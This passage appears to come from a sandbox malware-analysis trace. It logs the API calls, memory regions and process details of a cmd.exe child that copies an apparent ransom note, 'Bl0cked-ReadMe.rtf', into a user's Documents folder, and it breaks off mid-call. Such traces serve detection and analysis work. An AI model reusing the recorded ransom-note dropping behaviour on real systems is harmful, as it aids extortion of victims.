(in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eec0 | out: lpConsoleScreenBufferInfo=0x20eec0) returned 1 [0135.799] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0135.817] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ef00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0135.817] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20eee4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20eee4*=0x1a) returned 1 [0135.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.850] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0135.851] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.851] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0135.851] SetConsoleInputExeNameW () returned 0x1 [0135.851] GetConsoleOutputCP () returned 0x1b5 [0135.851] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.851] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.851] exit (_Code=0) Process: id = "134" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16880" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13575 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13576 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 13577 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 13578 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 13579 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13580 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13581 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13582 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13583 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 13584 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13931 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13932 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13933 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13934 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13935 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 13936 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13937 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13938 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13939 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13940 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13941 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13942 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13943 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13944 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13945 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 13946 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13947 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13948 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 13949 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13950 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 13951 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 13952 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 13953 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 13954 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 191 os_tid = 0xbb4 [0135.926] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f96c | out: lpSystemTimeAsFileTime=0x12f96c*(dwLowDateTime=0x8af362a0, dwHighDateTime=0x1d440a9)) [0135.926] GetCurrentProcessId () returned 0xb88 [0135.926] GetCurrentThreadId () returned 0xbb4 [0135.926] GetTickCount () returned 0x2afdd [0135.926] QueryPerformanceCounter (in: lpPerformanceCount=0x12f964 | out: lpPerformanceCount=0x12f964*=19271492678) returned 1 [0135.926] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0135.926] __set_app_type (_Type=0x1) [0135.926] __p__fmode () returned 0x76b331f4 [0135.926] __p__commode () returned 0x76b331fc [0135.926] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0135.927] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0135.927] GetCurrentThreadId () returned 0xbb4 [0135.927] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbb4) returned 0x38 [0135.927] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.927] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0135.927] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.927] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0135.927] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f8fc | out: phkResult=0x12f8fc*=0x0) returned 0x2 [0135.927] VirtualQuery (in: lpAddress=0x12f933, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.927] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0135.927] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0135.927] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0135.927] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f8cc, dwLength=0x1c | out: lpBuffer=0x12f8cc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0135.927] GetConsoleOutputCP () returned 0x1b5 [0135.927] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.927] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0135.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0135.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.928] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0135.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0135.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.928] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0135.928] GetEnvironmentStringsW () returned 0x340168* [0135.929] FreeEnvironmentStringsW (penv=0x340168) returned 1 [0135.929] GetEnvironmentStringsW () returned 0x340168* [0135.929] FreeEnvironmentStringsW (penv=0x340168) returned 1 [0135.929] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e86c | out: phkResult=0x12e86c*=0x40) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x90, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x1, lpcbData=0x12e870*=0x4) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x1, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x0, lpcbData=0x12e870*=0x4) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x40, lpcbData=0x12e870*=0x4) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x40, lpcbData=0x12e870*=0x4) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x40, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.929] RegCloseKey (hKey=0x40) returned 0x0 [0135.929] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e86c | out: phkResult=0x12e86c*=0x40) returned 0x0 [0135.929] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x40, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x1, lpcbData=0x12e870*=0x4) returned 0x0 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x1, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x0, lpcbData=0x12e870*=0x4) returned 0x0 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x9, lpcbData=0x12e870*=0x4) returned 0x0 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x4, lpData=0x12e878*=0x9, lpcbData=0x12e870*=0x4) returned 0x0 [0135.930] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e874, lpData=0x12e878, lpcbData=0x12e870*=0x1000 | out: lpType=0x12e874*=0x0, lpData=0x12e878*=0x9, lpcbData=0x12e870*=0x1000) returned 0x2 [0135.930] RegCloseKey (hKey=0x40) returned 0x0 [0135.930] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0135.930] srand (_Seed=0x5b88636a) [0135.930] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0135.930] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0135.930] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.930] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0135.930] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.930] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.930] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.931] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.931] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.931] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.931] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.931] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.931] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.931] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.931] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.931] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.931] GetEnvironmentStringsW () returned 0x3422b8* [0135.931] FreeEnvironmentStringsW (penv=0x3422b8) returned 1 [0135.931] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.931] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.931] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.931] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.931] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.931] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.931] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.931] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.931] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.931] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.931] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f638 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.931] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f638, lpFilePart=0x12f634 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f634*="Desktop") returned 0x18 [0135.931] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.932] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f3b4 | out: lpFindFileData=0x12f3b4) returned 0x33fff8 [0135.932] FindClose (in: hFindFile=0x33fff8 | out: hFindFile=0x33fff8) returned 1 [0135.932] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f3b4 | out: lpFindFileData=0x12f3b4) returned 0x33fff8 [0135.932] FindClose (in: hFindFile=0x33fff8 | out: hFindFile=0x33fff8) returned 1 [0135.932] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f3b4 | out: lpFindFileData=0x12f3b4) returned 0x33fff8 [0135.932] FindClose (in: hFindFile=0x33fff8 | out: hFindFile=0x33fff8) returned 1 [0135.932] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.932] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0135.932] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0135.933] GetEnvironmentStringsW () returned 0x342ad8* [0135.933] FreeEnvironmentStringsW (penv=0x342ad8) returned 1 [0135.933] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.933] GetConsoleOutputCP () returned 0x1b5 [0135.933] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.933] GetUserDefaultLCID () returned 0x409 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f778, cchData=128 | out: lpLCData="0") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f778, cchData=128 | out: lpLCData="0") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f778, cchData=128 | out: lpLCData="1") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0135.934] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0135.935] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.936] GetConsoleTitleW (in: lpConsoleTitle=0x3308d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.936] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0135.936] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0135.936] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0135.937] _wcsicmp (_String1="type", _String2=")") returned 75 [0135.937] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0135.937] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0135.937] _wcsicmp (_String1="IF", _String2="type") returned -11 [0135.937] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0135.937] _wcsicmp (_String1="REM", _String2="type") returned -2 [0135.937] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0135.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.941] GetFileType (hFile=0x7) returned 0x2 [0135.941] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0135.942] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f670 | out: lpMode=0x12f670) returned 1 [0135.942] _dup (_FileHandle=1) returned 3 [0135.942] _close (_FileHandle=1) returned 0 [0135.942] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0135.942] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f640, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0135.944] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0135.944] GetConsoleTitleW (in: lpConsoleTitle=0x12f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.944] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0135.944] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0135.944] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0135.944] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0135.944] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.945] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x12efd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12efd4) returned 0x330e50 [0135.945] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0135.945] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0135.945] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0135.945] CreateFileW 